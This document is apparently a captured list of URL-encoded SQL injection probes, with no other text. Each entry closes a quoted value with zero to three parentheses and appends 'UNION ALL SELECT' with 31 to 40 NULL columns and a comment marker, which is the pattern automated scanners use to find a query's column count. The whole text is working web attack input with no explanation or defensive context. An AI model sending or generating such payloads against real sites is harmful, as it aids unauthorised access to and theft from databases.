foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 